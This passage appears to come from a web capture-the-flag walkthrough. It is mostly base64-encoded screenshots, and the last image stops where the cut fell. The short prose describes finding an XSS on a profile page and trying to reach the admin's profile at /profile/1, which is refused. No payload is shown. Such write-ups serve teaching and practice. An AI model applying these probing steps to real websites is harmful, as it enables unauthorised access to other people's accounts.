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) Indeed we do! Another tool in our belt. I notice the URL for profile page is `/profile/2`, we can assume `/profile/1` will be for the `admin` user. Let's see what happens if we try go there... we just sent back to the homepage with an error message in the URL: `/?error=You+are+not+authorized+to+access+this+resource.`. This means the XSS on our profile page is potentially less helpful if the `admin` user is unable to see it... ![](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABGwAAAGQCAYAAAD7mPaZAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAADrOSURBVHhe7d3vrx31ndjxfdL/ok+QGsl5wn1SeBARZSVWSLVEFCtSIEUiSgpsVi5B6yabVrdbV07skqy78m4sIzlxVTdeeQORd0FBwDqxHAthnALOLtjh97rrAOIGFAMmxFKib2fm/Pp+Z75zzpxzfe2516+X9Fbie8+PmTnnXjwfz8z5gxtu/ESQJEmSJElSfzKwkSRJkiRJ6lkGNpIkSZIkST3LwEaSJEmSJKlnGdhIkiRJkiT1LAMbSZIkSZKknmVgI0mSJEmS1LP+YNOmTUGSJEmSJEn96Q/+7Sf+MEiSJEmSJKk/GdhIkiRJkiT1LAMbSZIkSZKknmVgI0mSJEmS1LMMbCRJkiRJknqWgY0kSZIkSVLPMrCRJEmSJEnqWQY2kiRJkiRJPcvARpIkSZIkqWcZ2EiSJEmSJPUsAxtJkiRJkqSeZWAjSZIkSZLUswxsJEmSJEmSepaBjSRJkiRJUs8ysJEkSZIkSepZBjaSJEmSJEk9y8BGkiRJkiSpZxnYSJIkSZIk9SwDG0mSJEmSpJ5lYCNJkiRJktSzDGwkSZIkSZJ6loGNJEmSJElSz1rVwObAC5dC6f1n92W/3/v+6rnwfrUG073+o8x9JUmSJElar319T9h/4H8X7Q///Z6t4b8/UPz//7k8+N49/yPsrb5eu4+uaIsPbD73d+HF34XwzjsfhPCbF8K+3G361HdPhDcuvBue/Kvoa/ftCw8+9uPw2KiT50I5gnrnhehrRQd2RvdZdd8Lx978ILxzcp0OuSRJkiRJa9q2/1kOUmqNhimXo8ZA5uoPbKp1vpzruAFaeGDzJ//wZgjhXPj7vYOjVF586PPZ2/WmH50rlvKD8LN4YFNveMTN2h5R82h4vXiOdXtUkiRJkiRpTWsOL5bDty/n0KY6umZP2Jb7XpmBTYcGQ66939ya+d7lacGBzZ+Gx86X85pHw6c/8e3w5DvF/3/574r/n7ttTzKwkSRJkiStg7LDi1lDlnkysLkM9XVgs/PpUM5oRkfVfOPku8Wf3gyP3Ze5bdmX9oTHfvFueP93xc1Kv/sgvH78e2Hfsx8Uf8gMUb72g/DkuQ/CpdHtLxW3P/mDcF98m2jwccdf/ji8fmFwPZ3S+28+HfZ9Kb1dwwfPhT3J4xVNG9h0WqY/DPf9zdPJspS3e/Hhb1Tf+/tyZtSQrn/9/pcunAtP/s3Xx9+vGg2f9hbb9bVyG5Z/zKyPJEmSJGndlR1eJEOU0bBgeXAq04H/Hb799dFth0fjjEsHL9Vjx99/4H+EL9WHD9mBTe1xq/vF319dswc209drVLp+e8K27HBqxmOV92ms3+A+1Xautk98/7UZ3Cw0sNlTDlp+93J48HPDrw0HOO88ORhMJH1uX/jZhXKicCm884unh9eKeTm8c6n4SjWXqA1svvZoeL38